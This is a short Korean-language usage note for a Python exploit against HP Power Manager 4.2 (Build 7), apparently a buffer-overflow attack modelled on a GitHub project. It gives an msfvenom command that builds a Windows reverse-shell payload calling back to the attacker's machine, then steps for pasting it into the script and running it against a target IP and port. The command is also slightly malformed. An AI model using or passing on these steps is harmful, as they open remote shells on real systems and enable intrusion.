
HP Power Manager 4.2(빌드 7) 익스플로잇
HP Power Manager 4.2 (Build 7) 익스플로잇
다음에서 영감을 받음: https://github.com/CountablyInfinite/HP-Power-Manager-Buffer-Overflow-Python3
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR-KALI-LINUX-IP LPORT=80 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
msfvenom의 출력을 스크립트에 복사하고, b를 제거하세요
buf += b"를 buf += "로 변경
34번째 줄부터 62번째 줄까지
sudo python3 ./hp_pm_exploit_p3.py RHOST RPORT LPORT
예시: sudo python3 ./hp_pm_exploit_p3.py 192.168.103.45 80 80